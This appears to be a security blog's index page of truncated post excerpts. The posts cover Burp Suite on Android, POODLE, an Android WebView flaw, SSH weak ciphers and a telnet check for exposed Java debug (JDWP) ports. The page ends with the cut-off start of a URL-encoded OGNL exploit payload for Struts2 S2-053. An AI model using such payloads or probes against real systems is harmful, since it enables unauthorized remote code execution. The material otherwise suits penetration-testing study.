Configuring Burp Suite with Android Nougat

This last weekend I started testing a new Android app for fun, and ran into some trouble getting Burp Suite working properly. I burned a whole afternoon troubleshooting the issue, ...

The POODLE attack (SSLv3 supported)

较早的漏洞了,每次复现都要百度,自己记录下吧。 1.漏洞影响:攻击者可以利用此漏洞获取受害者的https请求中的敏感信息,如cookies等; 2.漏洞利用需要具备的条件: 1)HTTPS通信双方需均使用了SSLv3协议,且加密算法采用CBC模式的块加密; 2)攻击者需要能够控制受害者发起特意构造的https请求,截获并修改加密后的请求; 3.漏洞涉及范...

Android平台WebView控件跨域访问高危漏洞(CNVD-2017-36682)

2017年12月7日,国家信息安全漏洞共享平台(CNVD)接收到腾讯玄武实验室报送的Android WebView存在跨域访问漏洞(CNVD-2017-36682)。攻击者利用该漏洞,可远程获取用户隐私数据(包括手机应用数据、照片、文档等敏感信息),还可窃取用户登录凭证,在受害者毫无察觉的情况下实现对APP用户账户的完全控制。由于该组件广泛应用于Androi...

SSH Weak Algorithms Supported,SSH Server CBC Mode Ciphers Enabled,SSH Weak MAC Algorithms Enabled

Nessus扫描漏洞编号: 中 90317 (1) – SSH Weak Algorithms Supported 低 70658 (1) – SSH Server CBC Mode Ciphers Enabled 低 71049 (1) – SSH Weak MAC Algorithms Enabled ...

Java Debug Remote Code Execution

1. 判断是否存在jdwp命令执行漏洞 telnet端口后,输入命令JDWP-Handshake 如果返回JDWP-Handshake,证明存在漏洞。 并且,如果不快速输入,连接立马就会断掉。 ➜ ~ telnet 1.2.3.4 8000 Trying 1.2.3.4... Connected to 1.2.3.4. Escape charact...

s2-053 Exp

%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2....